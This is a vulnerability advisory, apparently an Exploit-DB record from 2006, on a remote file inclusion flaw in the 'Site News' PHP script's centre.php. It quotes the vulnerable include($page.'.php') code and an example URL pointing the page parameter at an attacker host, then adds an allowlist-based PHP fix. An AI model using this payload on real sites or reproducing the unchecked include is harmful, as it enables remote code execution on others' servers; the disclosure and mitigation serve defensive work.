vendor: Site News
by: DaDIsS
CVSS: N/A
Remote File Inclusion
CWE: 98
Product Name: Site News
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Site News => (centre.php) $page Remote File Inclusion Exploit

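The flaw resides in the centre.php file, which contains this code: if (empty($page)) { include('accueil.php'); } else { include($page.'.php'); }. The value of $page is passed to include() without any check, so a request can supply a remote URL in its place. An example of the exploit is http://www.victime.com/(path)/centre.php?page=http://attacker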

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file inclusion operation.
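
One way to apply this mitigation to the centre.php snippet quoted above, shown as an added example that is not code from Site News or from the advisory. It assumes PHP 7.1 or later; the page names other than accueil are hypothetical placeholders for the site's own pages.

```php
<?php
// Added example: allowlist-based replacement for include($page.".php").
// 'news' and 'contact' are hypothetical page names; only 'accueil' is from the page.

// Request value => file on disk. Nothing outside this map can be included.
const PAGES = [
    'accueil' => 'accueil.php',
    'news'    => 'news.php',
    'contact' => 'contact.php',
];

/** Map a requested page name to a local file, or null if it is not allowed. */
function resolve_page(?string $requested): ?string
{
    if ($requested === null || $requested === '') {
        return PAGES['accueil'];   // same default as the original script
    }
    // Exact-match lookup: a URL or a path can never equal one of the keys,
    // so the request value itself never reaches include().
    return PAGES[$requested] ?? null;
}

// Command-line self-check over constructed inputs.
if (PHP_SAPI === 'cli') {
    foreach (['', 'news', 'http://attacker', 'unknown'] as $input) {
        printf("%-18s => %s\n", var_export($input, true),
               resolve_page($input) ?? 'REJECTED');
    }
    exit(0);
}

// Read the parameter explicitly instead of relying on a global $page.
$page = (isset($_GET['page']) && is_string($_GET['page'])) ? $_GET['page'] : null;
$file = resolve_page($page);

if ($file === null) {
    http_response_code(404);
    exit('Page not found');
}

// The included path is built only from the constant map, never from input.
include __DIR__ . '/' . $file;
```

As defence in depth, setting allow_url_include = Off in php.ini stops include() from fetching http:// URLs even if a similar pattern exists elsewhere in the code base.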

Exploit-DB raw data:

#===================================================================================#
#
# Site News => (centre.php) $page Remote File Inclusion Exploit
#
#===================================================================================#
#
# Softname : Site News
# Url : http://dvmet.free.fr/script/site_news.zip
# Exploit type : Remote File Inclusion.
# Critical: Dangerous.
# Solution Status: Unpatched.
#
#===================================================================================#
#
# By DaDIsS - Member of the Moroccan Hackers Team
#
#===================================================================================#
#
# Exploit Explanation : 
#
#
# The flaw resides in the centre.php file, which contains this code :
# 
# <?
#
#   if (empty($page))
#    {
#         include("accueil.php");
#    }
#      else
#    {
#        include($page.".php");
#    }
#
# ?>
#
#===================================================================================#
#
# Example : 
#
#
# http://www.victime.com/(path)/centre.php?page=http://attacker
#
#
#================================================================#
#
# Greetz : YouYouCool, Hacker1, and all Moroccan Hackers Team, viva Morocco guyz !!
#
#===================================================================================#
#
# DaDIsS / dadiss@virtuaplanet.net
# Proud to be a Moroccan !
#
#===================================================================================#

# milw0rm.com [2006-11-23]